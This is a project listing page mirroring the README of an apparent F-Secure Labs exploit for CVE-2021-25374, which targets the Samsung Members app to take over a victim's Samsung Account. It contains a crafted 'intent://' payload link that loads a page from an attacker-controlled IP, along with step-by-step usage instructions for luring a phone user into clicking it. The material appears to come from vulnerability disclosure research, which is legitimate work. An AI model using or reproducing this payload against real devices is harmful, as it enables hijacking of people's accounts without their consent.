GitPlanet

Cheap and reliable Node.js hosting starts at $3/month, and $1/month static HTML hosting

Created with love in Canada, visit hostnodejs.com today

Feel like to post an Ad? Learn Details
All Projects → FSecureLABS → CVE-2021-25374_Samsung-Account-Access

FSecureLABS / CVE-2021-25374_Samsung-Account-Access

Licence: other
This script can be used to gain access to a victim's Samsung Account if they have a specific version of Samsung Members installed on their Samsung Device, and if the victim's device is from the US or Korea region.

Programming Languages

python
139335 projects - #7 most used programming language

CVE-2021-25374 - Samsung Account Access Script

This script can be used to gain access to a victim's Samsung Account if they have a specific version of Samsung Members installed on their Samsung Device, and if the victim's device is from the US or Korea region.

How to use this script:

  1. Host a web server and have it host a web page with the following link:

<a href="intent://launch?url=http://<attacker IP>:8000/yay.html&action=sso&from=ZZ&iso=ZZ#Intent;scheme=samsungrewards;package=com.samsung.android.voc;action=android.intent.action.VIEW;end;">yay click here yay</a>

NOTE: replace "<attacker IP>" with the IP address that you'll be running this script from.

  1. Run this script

python3 ./samsung_account_access.py

  1. Using a Samsung Phone, browse to the web server and click on the link

  2. Let the script do its thing

More information about the issue this script exploits can be found here:

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].